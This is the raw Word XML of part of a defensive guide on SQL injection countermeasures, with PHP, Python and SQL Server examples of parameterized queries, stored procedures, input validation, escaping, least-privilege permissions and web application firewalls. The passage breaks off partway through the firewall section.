    <w:p w:rsidR="007B405C" w:rsidRPr="007B405C" w:rsidRDefault="007B405C" w:rsidP="007B405C">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B405C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Each of these techniques exploits flaws in how SQL queries are constructed and executed in web applications, especially where user input is not properly sanitized or validated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A3840" w:rsidRDefault="007A3840" w:rsidP="007B405C"/>
    <w:p w:rsidR="002C6C05" w:rsidRDefault="002C6C05" w:rsidP="007B405C"/>
    <w:p w:rsidR="007A3840" w:rsidRDefault="007A3840" w:rsidP="002C6C05"/>
    <w:p w:rsidR="002C6C05" w:rsidRDefault="002C6C05" w:rsidP="002C6C05"/>
    <w:p w:rsidR="002C6C05" w:rsidRDefault="002C6C05" w:rsidP="002C6C05"/>
    <w:p w:rsidR="002C6C05" w:rsidRPr="002C6C05" w:rsidRDefault="002C6C05" w:rsidP="002C6C05">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>SQL Injection Countermeasures</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Prepared Statements (Parameterized Queries)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prepared statements ensure that user input is treated as data, not executable code. By using placeholders for user inputs, SQL queries are securely separated from the data.</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 xml:space="preserve">Example (PHP with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MySQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>):</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 xml:space="preserve"> = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mysqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prepare(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"SELECT * FROM users WHERE username = ? AND password </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>= ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>");</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-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bind_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>param</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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ss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>", $username, $password); // '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' indicates string parameters</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-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>execute(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</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$result = $</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-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>get_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</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Example (Python with SQLite):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python</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2C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cursor.execute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">("SELECT * FROM users WHERE username = ? AND password </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>= ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>", (username, password))</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Stored Procedures</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Stored procedures allow SQL queries to be precompiled and stored in the database. This method helps in separating logic from user input, and when used correctly, it can minimize the risk of SQL injection.</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Example (SQL Server):</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sql</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CREATE PROCEDURE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GetUser</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    @username </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NVARCHAR(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>50),</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@password </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NVARCHAR(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>50)</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AS</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BEGIN</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SELECT * FROM users WHERE username = @username AND password = @password;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END</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In the application:</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 xml:space="preserve"> = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mysqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prepare(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"EXEC </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GetUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ?, ?");</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-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bind_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>param</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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ss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>", $username, $password);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stmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>execute(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</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Input Validation and Sanitization</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Input validation ensures that data conforms to the expected type, format, and length before it is used in a SQL query. While input sanitization is important, validation should be the primary defense.</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Example (PHP Input Validation):</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if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(!</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>preg</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_match</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>("/^[a-zA-Z0-9]*$/", $username)) {</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echo "Invalid username.";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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exit(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</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While this approach can help limit malicious input, it should not be relied upon as the only defense. It can be bypassed with techniques like encoding or escaping characters.</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Escaping User Input</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> If parameterized queries or stored procedures cannot be used, you should escape user inputs before using them in a SQL query. Escaping special characters ensures they are treated as data, not executable code.</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 xml:space="preserve">Example (PHP with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MySQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> escaping):</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$username = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mysqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>real_escape_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>($_POST['username']);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$password = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mysqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>real_escape_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>($_POST['password']);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$query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";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$result = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mysqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;query($query);</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Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> While escaping can mitigate some risks, using prepared statements is far safer and the preferred method.</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lastRenderedPageBreak/>
        <w:t>Limit Database Permissions</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Restricting database access privileges for the application is critical. Use the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Principle of Least Privilege</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> by ensuring the application only has the necessary permissions to perform its intended tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6C05" w:rsidRPr="002C6C05" w:rsidRDefault="002C6C05" w:rsidP="002C6C0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Read-Only Access:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the application only needs to retrieve data, avoid giving it write or administrative access to the database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6C05" w:rsidRDefault="002C6C05" w:rsidP="002C6C0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Different Accounts:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use different accounts for different parts of the application with the least privilege needed for each section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6C05" w:rsidRPr="002C6C05" w:rsidRDefault="002C6C05" w:rsidP="002C6C05">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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Web Application Firewalls (WAFs)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> A Web Application Firewall can help detect and block SQL injection attempts. Many WAFs have built-in rules to identify SQL injection patterns and mitigate potential threats before they reach the database.</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Example (</w:t>
      </w:r>
